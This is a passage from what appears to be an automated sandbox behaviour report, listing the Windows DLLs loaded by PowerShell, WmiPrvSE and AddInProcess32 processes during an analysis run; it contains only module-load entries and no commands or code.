                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: comsvcs.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windowscodecs.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: propsys.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: edputil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: policymanager.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: appresolver.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcp47langs.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: slc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sppc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
